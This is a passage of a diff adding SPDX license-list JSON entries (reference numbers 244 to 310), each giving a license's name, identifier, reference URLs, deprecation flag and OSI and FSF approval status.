+ "reference": "https://spdx.org/licenses/GPL-3.0+.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GPL-3.0+.json",
+ "referenceNumber": 244,
+ "name": "GNU General Public License v3.0 or later",
+ "licenseId": "GPL-3.0+",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/gpl-3.0-standalone.html",
+ "https://opensource.org/licenses/GPL-3.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/MulanPSL-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MulanPSL-2.0.json",
+ "referenceNumber": 245,
+ "name": "Mulan Permissive Software License, Version 2",
+ "licenseId": "MulanPSL-2.0",
+ "seeAlso": [
+ "https://license.coscl.org.cn/MulanPSL2/"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/FSFAP.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/FSFAP.json",
+ "referenceNumber": 246,
+ "name": "FSF All Permissive License",
+ "licenseId": "FSFAP",
+ "seeAlso": [
+ "https://www.gnu.org/prep/maintain/html_node/License-Notices-for-Other-Files.html"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Xerox.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Xerox.json",
+ "referenceNumber": 247,
+ "name": "Xerox License",
+ "licenseId": "Xerox",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Xerox"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CDDL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CDDL-1.0.json",
+ "referenceNumber": 248,
+ "name": "Common Development and Distribution License 1.0",
+ "licenseId": "CDDL-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/cddl1"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.3-invariants-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.3-invariants-only.json",
+ "referenceNumber": 249,
+ "name": "GNU Free Documentation License v1.3 only - invariants",
+ "licenseId": "GFDL-1.3-invariants-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/fdl-1.3.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/etalab-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/etalab-2.0.json",
+ "referenceNumber": 250,
+ "name": "Etalab Open License 2.0",
+ "licenseId": "etalab-2.0",
+ "seeAlso": [
+ "https://github.com/DISIC/politique-de-contribution-open-source/blob/master/LICENSE.pdf",
+ "https://raw.githubusercontent.com/DISIC/politique-de-contribution-open-source/master/LICENSE"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/XFree86-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/XFree86-1.1.json",
+ "referenceNumber": 251,
+ "name": "XFree86 License 1.1",
+ "licenseId": "XFree86-1.1",
+ "seeAlso": [
+ "http://www.xfree86.org/current/LICENSE4.html"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/SNIA.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SNIA.json",
+ "referenceNumber": 252,
+ "name": "SNIA Public License 1.1",
+ "licenseId": "SNIA",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/SNIA_Public_License"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LPPL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LPPL-1.1.json",
+ "referenceNumber": 253,
+ "name": "LaTeX Project Public License v1.1",
+ "licenseId": "LPPL-1.1",
+ "seeAlso": [
+ "http://www.latex-project.org/lppl/lppl-1-1.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CATOSL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CATOSL-1.1.json",
+ "referenceNumber": 254,
+ "name": "Computer Associates Trusted Open Source License 1.1",
+ "licenseId": "CATOSL-1.1",
+ "seeAlso": [
+ "https://opensource.org/licenses/CATOSL-1.1"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/TU-Berlin-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/TU-Berlin-2.0.json",
+ "referenceNumber": 255,
+ "name": "Technische Universitaet Berlin License 2.0",
+ "licenseId": "TU-Berlin-2.0",
+ "seeAlso": [
+ "https://github.com/CorsixTH/deps/blob/fd339a9f526d1d9c9f01ccf39e438a015da50035/licences/libgsm.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.3.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.3.json",
+ "referenceNumber": 256,
+ "name": "GNU Free Documentation License v1.3",
+ "licenseId": "GFDL-1.3",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/fdl-1.3.txt"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.3-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.3-or-later.json",
+ "referenceNumber": 257,
+ "name": "GNU Free Documentation License v1.3 or later",
+ "licenseId": "GFDL-1.3-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/fdl-1.3.txt"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/LAL-1.2.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LAL-1.2.json",
+ "referenceNumber": 258,
+ "name": "Licence Art Libre 1.2",
+ "licenseId": "LAL-1.2",
+ "seeAlso": [
+ "http://artlibre.org/licence/lal/licence-art-libre-12/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/ICU.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/ICU.json",
+ "referenceNumber": 259,
+ "name": "ICU License",
+ "licenseId": "ICU",
+ "seeAlso": [
+ "http://source.icu-project.org/repos/icu/icu/trunk/license.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/FTL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/FTL.json",
+ "referenceNumber": 260,
+ "name": "Freetype Project License",
+ "licenseId": "FTL",
+ "seeAlso": [
+ "http://freetype.fis.uniroma2.it/FTL.TXT",
+ "http://git.savannah.gnu.org/cgit/freetype/freetype2.git/tree/docs/FTL.TXT",
+ "http://gitlab.freedesktop.org/freetype/freetype/-/raw/master/docs/FTL.TXT"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/MirOS.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MirOS.json",
+ "referenceNumber": 261,
+ "name": "The MirOS Licence",
+ "licenseId": "MirOS",
+ "seeAlso": [
+ "https://opensource.org/licenses/MirOS"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-2-Clause-NetBSD.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/BSD-2-Clause-NetBSD.json",
+ "referenceNumber": 262,
+ "name": "BSD 2-Clause NetBSD License",
+ "licenseId": "BSD-2-Clause-NetBSD",
+ "seeAlso": [
+ "http://www.netbsd.org/about/redistribution.html#default"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-ND-3.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-ND-3.0.json",
+ "referenceNumber": 263,
+ "name": "Creative Commons Attribution Non Commercial No Derivatives 3.0 Unported",
+ "licenseId": "CC-BY-NC-ND-3.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc-nd/3.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OSET-PL-2.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OSET-PL-2.1.json",
+ "referenceNumber": 264,
+ "name": "OSET Public License version 2.1",
+ "licenseId": "OSET-PL-2.1",
+ "seeAlso": [
+ "http://www.osetfoundation.org/public-license",
+ "https://opensource.org/licenses/OPL-2.1"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-ND-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-ND-2.0.json",
+ "referenceNumber": 265,
+ "name": "Creative Commons Attribution Non Commercial No Derivatives 2.0 Generic",
+ "licenseId": "CC-BY-NC-ND-2.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc-nd/2.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/SISSL-1.2.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SISSL-1.2.json",
+ "referenceNumber": 266,
+ "name": "Sun Industry Standards Source License v1.2",
+ "licenseId": "SISSL-1.2",
+ "seeAlso": [
+ "http://gridscheduler.sourceforge.net/Gridengine_SISSL_license.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Wsuipa.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Wsuipa.json",
+ "referenceNumber": 267,
+ "name": "Wsuipa License",
+ "licenseId": "Wsuipa",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Wsuipa"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Zimbra-1.4.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Zimbra-1.4.json",
+ "referenceNumber": 268,
+ "name": "Zimbra Public License v1.4",
+ "licenseId": "Zimbra-1.4",
+ "seeAlso": [
+ "http://www.zimbra.com/legal/zimbra-public-license-1-4"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Linux-OpenIB.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Linux-OpenIB.json",
+ "referenceNumber": 269,
+ "name": "Linux Kernel Variant of OpenIB.org license",
+ "licenseId": "Linux-OpenIB",
+ "seeAlso": [
+ "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/drivers/infiniband/core/sa.h"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LGPL-3.0.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/LGPL-3.0.json",
+ "referenceNumber": 270,
+ "name": "GNU Lesser General Public License v3.0 only",
+ "licenseId": "LGPL-3.0",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/lgpl-3.0-standalone.html",
+ "https://opensource.org/licenses/LGPL-3.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-2.5.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-2.5.json",
+ "referenceNumber": 271,
+ "name": "Open LDAP Public License v2.5",
+ "licenseId": "OLDAP-2.5",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d6852b9d90022e8593c98205413380536b1b5a7cf"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/AMPAS.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/AMPAS.json",
+ "referenceNumber": 272,
+ "name": "Academy of Motion Picture Arts and Sciences BSD",
+ "licenseId": "AMPAS",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/BSD#AMPASBSD"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-1.0-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GPL-1.0-or-later.json",
+ "referenceNumber": 273,
+ "name": "GNU General Public License v1.0 or later",
+ "licenseId": "GPL-1.0-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/gpl-1.0-standalone.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/BUSL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BUSL-1.1.json",
+ "referenceNumber": 274,
+ "name": "Business Source License 1.1",
+ "licenseId": "BUSL-1.1",
+ "seeAlso": [
+ "https://mariadb.com/bsl11/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Adobe-Glyph.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Adobe-Glyph.json",
+ "referenceNumber": 275,
+ "name": "Adobe Glyph List License",
+ "licenseId": "Adobe-Glyph",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/MIT#AdobeGlyph"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/0BSD.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/0BSD.json",
+ "referenceNumber": 276,
+ "name": "BSD Zero Clause License",
+ "licenseId": "0BSD",
+ "seeAlso": [
+ "http://landley.net/toybox/license.html"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/W3C-19980720.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/W3C-19980720.json",
+ "referenceNumber": 277,
+ "name": "W3C Software Notice and License (1998-07-20)",
+ "licenseId": "W3C-19980720",
+ "seeAlso": [
+ "http://www.w3.org/Consortium/Legal/copyright-software-19980720.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/FSFUL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/FSFUL.json",
+ "referenceNumber": 278,
+ "name": "FSF Unlimited License",
+ "licenseId": "FSFUL",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/FSF_Unlimited_License"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-SA-3.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-3.0.json",
+ "referenceNumber": 279,
+ "name": "Creative Commons Attribution Non Commercial Share Alike 3.0 Unported",
+ "licenseId": "CC-BY-NC-SA-3.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc-sa/3.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/DOC.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/DOC.json",
+ "referenceNumber": 280,
+ "name": "DOC License",
+ "licenseId": "DOC",
+ "seeAlso": [
+ "http://www.cs.wustl.edu/~schmidt/ACE-copying.html",
+ "https://www.dre.vanderbilt.edu/~schmidt/ACE-copying.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/TMate.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/TMate.json",
+ "referenceNumber": 281,
+ "name": "TMate Open Source License",
+ "licenseId": "TMate",
+ "seeAlso": [
+ "http://svnkit.com/license.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/MIT-open-group.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MIT-open-group.json",
+ "referenceNumber": 282,
+ "name": "MIT Open Group variant",
+ "licenseId": "MIT-open-group",
+ "seeAlso": [
+ "https://gitlab.freedesktop.org/xorg/app/iceauth/-/blob/master/COPYING",
+ "https://gitlab.freedesktop.org/xorg/app/xvinfo/-/blob/master/COPYING",
+ "https://gitlab.freedesktop.org/xorg/app/xsetroot/-/blob/master/COPYING",
+ "https://gitlab.freedesktop.org/xorg/app/xauth/-/blob/master/COPYING"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/AMDPLPA.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/AMDPLPA.json",
+ "referenceNumber": 283,
+ "name": "AMD\u0027s plpa_map.c License",
+ "licenseId": "AMDPLPA",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/AMD_plpa_map_License"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Condor-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Condor-1.1.json",
+ "referenceNumber": 284,
+ "name": "Condor Public License v1.1",
+ "licenseId": "Condor-1.1",
+ "seeAlso": [
+ "http://research.cs.wisc.edu/condor/license.html#condor",
+ "http://web.archive.org/web/20111123062036/http://research.cs.wisc.edu/condor/license.html#condor"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/PolyForm-Noncommercial-1.0.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/PolyForm-Noncommercial-1.0.0.json",
+ "referenceNumber": 285,
+ "name": "PolyForm Noncommercial License 1.0.0",
+ "licenseId": "PolyForm-Noncommercial-1.0.0",
+ "seeAlso": [
+ "https://polyformproject.org/licenses/noncommercial/1.0.0"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-3-Clause-No-Military-License.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-No-Military-License.json",
+ "referenceNumber": 286,
+ "name": "BSD 3-Clause No Military License",
+ "licenseId": "BSD-3-Clause-No-Military-License",
+ "seeAlso": [
+ "https://gitlab.syncad.com/hive/dhive/-/blob/master/LICENSE",
+ "https://github.com/greymass/swift-eosio/blob/master/LICENSE"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-4.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-4.0.json",
+ "referenceNumber": 287,
+ "name": "Creative Commons Attribution 4.0 International",
+ "licenseId": "CC-BY-4.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by/4.0/legalcode"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OGL-Canada-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OGL-Canada-2.0.json",
+ "referenceNumber": 288,
+ "name": "Open Government Licence - Canada",
+ "licenseId": "OGL-Canada-2.0",
+ "seeAlso": [
+ "https://open.canada.ca/en/open-government-licence-canada"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-SA-3.0-IGO.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-3.0-IGO.json",
+ "referenceNumber": 289,
+ "name": "Creative Commons Attribution Non Commercial Share Alike 3.0 IGO",
+ "licenseId": "CC-BY-NC-SA-3.0-IGO",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc-sa/3.0/igo/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/EFL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/EFL-1.0.json",
+ "referenceNumber": 290,
+ "name": "Eiffel Forum License v1.0",
+ "licenseId": "EFL-1.0",
+ "seeAlso": [
+ "http://www.eiffel-nice.org/license/forum.txt",
+ "https://opensource.org/licenses/EFL-1.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Newsletr.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Newsletr.json",
+ "referenceNumber": 291,
+ "name": "Newsletr License",
+ "licenseId": "Newsletr",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Newsletr"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/copyleft-next-0.3.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/copyleft-next-0.3.0.json",
+ "referenceNumber": 292,
+ "name": "copyleft-next 0.3.0",
+ "licenseId": "copyleft-next-0.3.0",
+ "seeAlso": [
+ "https://github.com/copyleft-next/copyleft-next/blob/master/Releases/copyleft-next-0.3.0"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-3.0-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GPL-3.0-or-later.json",
+ "referenceNumber": 293,
+ "name": "GNU General Public License v3.0 or later",
+ "licenseId": "GPL-3.0-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/gpl-3.0-standalone.html",
+ "https://opensource.org/licenses/GPL-3.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CDLA-Permissive-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CDLA-Permissive-2.0.json",
+ "referenceNumber": 294,
+ "name": "Community Data License Agreement Permissive 2.0",
+ "licenseId": "CDLA-Permissive-2.0",
+ "seeAlso": [
+ "https://cdla.dev/permissive-2-0"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-ND-3.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-ND-3.0.json",
+ "referenceNumber": 295,
+ "name": "Creative Commons Attribution No Derivatives 3.0 Unported",
+ "licenseId": "CC-BY-ND-3.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nd/3.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/C-UDA-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/C-UDA-1.0.json",
+ "referenceNumber": 296,
+ "name": "Computational Use of Data Agreement v1.0",
+ "licenseId": "C-UDA-1.0",
+ "seeAlso": [
+ "https://github.com/microsoft/Computational-Use-of-Data-Agreement/blob/master/C-UDA-1.0.md",
+ "https://cdla.dev/computational-use-of-data-agreement-v1-0/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Barr.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Barr.json",
+ "referenceNumber": 297,
+ "name": "Barr License",
+ "licenseId": "Barr",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Barr"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Vim.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Vim.json",
+ "referenceNumber": 298,
+ "name": "Vim License",
+ "licenseId": "Vim",
+ "seeAlso": [
+ "http://vimdoc.sourceforge.net/htmldoc/uganda.html"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-2.0-with-classpath-exception.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GPL-2.0-with-classpath-exception.json",
+ "referenceNumber": 299,
+ "name": "GNU General Public License v2.0 w/Classpath exception",
+ "licenseId": "GPL-2.0-with-classpath-exception",
+ "seeAlso": [
+ "https://www.gnu.org/software/classpath/license.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/BitTorrent-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BitTorrent-1.1.json",
+ "referenceNumber": 300,
+ "name": "BitTorrent Open Source License v1.1",
+ "licenseId": "BitTorrent-1.1",
+ "seeAlso": [
+ "http://directory.fsf.org/wiki/License:BitTorrentOSL1.1"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CDL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CDL-1.0.json",
+ "referenceNumber": 301,
+ "name": "Common Documentation License 1.0",
+ "licenseId": "CDL-1.0",
+ "seeAlso": [
+ "http://www.opensource.apple.com/cdl/",
+ "https://fedoraproject.org/wiki/Licensing/Common_Documentation_License",
+ "https://www.gnu.org/licenses/license-list.html#ACDL"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-SA-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-1.0.json",
+ "referenceNumber": 302,
+ "name": "Creative Commons Attribution Share Alike 1.0 Generic",
+ "licenseId": "CC-BY-SA-1.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-sa/1.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/ADSL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/ADSL.json",
+ "referenceNumber": 303,
+ "name": "Amazon Digital Services License",
+ "licenseId": "ADSL",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/AmazonDigitalServicesLicense"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/PostgreSQL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/PostgreSQL.json",
+ "referenceNumber": 304,
+ "name": "PostgreSQL License",
+ "licenseId": "PostgreSQL",
+ "seeAlso": [
+ "http://www.postgresql.org/about/licence",
+ "https://opensource.org/licenses/PostgreSQL"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OFL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OFL-1.1.json",
+ "referenceNumber": 305,
+ "name": "SIL Open Font License 1.1",
+ "licenseId": "OFL-1.1",
+ "seeAlso": [
+ "http://scripts.sil.org/cms/scripts/page.php?item_id\u003dOFL_web",
+ "https://opensource.org/licenses/OFL-1.1"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/NPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NPL-1.0.json",
+ "referenceNumber": 306,
+ "name": "Netscape Public License v1.0",
+ "licenseId": "NPL-1.0",
+ "seeAlso": [
+ "http://www.mozilla.org/MPL/NPL/1.0/"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/xinetd.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/xinetd.json",
+ "referenceNumber": 307,
+ "name": "xinetd License",
+ "licenseId": "xinetd",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Xinetd_License"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/LGPL-2.0-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LGPL-2.0-only.json",
+ "referenceNumber": 308,
+ "name": "GNU Library General Public License v2 only",
+ "licenseId": "LGPL-2.0-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/lgpl-2.0-standalone.html"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/zlib-acknowledgement.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/zlib-acknowledgement.json",
+ "referenceNumber": 309,
+ "name": "zlib/libpng License with Acknowledgement",
+ "licenseId": "zlib-acknowledgement",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/ZlibWithAcknowledgement"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-2.2.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-2.2.1.json",
+ "referenceNumber": 310,
+ "name": "Open LDAP Public License v2.2.1",
+ "licenseId": "OLDAP-2.2.1",
+ "seeAlso": [
